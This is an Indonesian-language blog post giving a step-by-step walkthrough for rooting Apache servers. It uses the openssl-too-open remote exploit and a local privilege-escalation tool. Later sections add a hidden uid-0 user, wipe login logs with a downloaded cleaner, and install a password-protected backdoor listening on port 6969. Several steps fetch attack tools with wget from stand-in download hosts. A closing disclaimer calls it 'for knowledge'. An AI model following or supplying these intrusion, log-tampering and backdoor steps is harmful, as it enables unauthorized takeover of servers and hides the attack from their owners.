Rooting Apache Lewat OPEN SSL


Pada Artikel kali ini saya akan mencoba memberikan Langkah – Langkah untuk membuat Rooting Apache Lewat Open SSL

Program atau Aplikasi yang harus anda punya ialah:

1. Download Apache Chunked Scanner
2. Download putty.exe
3. Scanning for IP range menggunakan Apache Chunked Scanner
4. Dapet target buka putty
5. login ke shell account lewat ssh <— untuk user windows harus punya shell account di suatu server yang pakai linux langsung aja ke langkah 6 dan ngga perlu putty
6. Download openSSL source code ke shell account kita dengan perintah ‘wget http://www.tempat-download.com/openssl-too-open.tar.gz&#8217;
7. ekstrak file dengan perintah ‘tar -zxvf openssl-too-open.tar.gz’
8. masuk ke direktorinya dengan mengetikan ‘cd openssl-too-open’
9. ketik ‘make’ lalu ketik ‘chmod +x openssl’
10. ketik ‘./openssl-too-open’ akan terlihat jenis2 server yang bisa di rooting
11. target Scanning dari Apache Chunked Scanner anggap saja 
     IP : 202.10.20.30
     Apache : Apache 1.3.23
    OS Linux : RedHat 7.3
12. Maka ketikan ‘./openssl-too-open -a 0x0b -v 202.10.20.30’
13. Mulai local xploit ketik ‘mkdir /var/tmp’ lalu masuk ke dir ketik ‘cd /var/tmp’
14. Ketik ‘wget http://www.tempat-download.com/local.tar.gz&#8217;
15. Ketik ‘tar xzf local.tar.gz’
16. Ketik ‘cd local’
17. Ketik ‘./lconfex -p’ akan diinformasikan shellcode, padstring, dan magic-number
18. Buat direktori ‘segfault.eng’ dengan file ‘segfault.eng’ lalu command touch dan kemudian commad ‘./lconfex -s (shellcode) -m (padstring) -r (magic-number)
untuk perintahnya 

‘mkdir segfault.eng ; touch segfault.eng/segfault.eng’
‘./lconfex -s (shellcode) -m (pandstring) -r (magic-number)’
untuk perintah diatas masalah shellcode, padstring, magic-number kamu pasti tau setelah perintah 17 dijalankan
19. Ketik ‘id’ klo muncul —> root uid=0(root) gid=48(apache) groups=48(apache),89(sympa) <— anda adalah root

Tahap adduser, pembersihan log, backdoor

1. ketik ‘/usr/sbin/useradd vr -u 0 -o -g root -s /bin/bash -d /dev/.vr passwd -d vr <— add user root nama vr
/usr/sbin/useradd vr <— menambahkan login user nama vr
root <— akses root
/bin/bash -d /dev/.vr <— create dir vr
passwd -d vr <— password vr
* catatan : login, direktori dan password harus sama
2. Buka new session pakek putty dan mulai login ke target
3. Ketik ‘lastlog | grep vr’
4. Download tools untuk menghapus jejak kita ketik ‘wget http://www.tempat-download.com/remove.c&#8217;
5. compile file tersebut ketik ‘gcc -o r remove.c DGENERIC’
6. hapus log user vr ketik ‘./remove vr’
7. Install backdoor ketik ‘wget http://www.alamat-download.com/backdoor.tar.gz&#8217;
8. ketik ‘tar xzf backdoor.tar.gz’
9. Ketik ‘cd shv4’
10. Ketik ‘./setup n3rd 6969’ —> n3rd = password login backdoor 6969 = port backdoor
11. menghapus semua kemungkinan mengarah ke kita ; user dan direktori yang kita buat ketik ‘/usr/sbin/userdel -r vr’
12. silahkan login ke shell dengan port 6969 dengan password n3rd pada target :p
jangan diacak2 ya targetnya karena semua ini untuk pengetahuan segala bentuk penyalahgunaan bukan tanggung jawab Ane.

 

 

Leave a comment

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: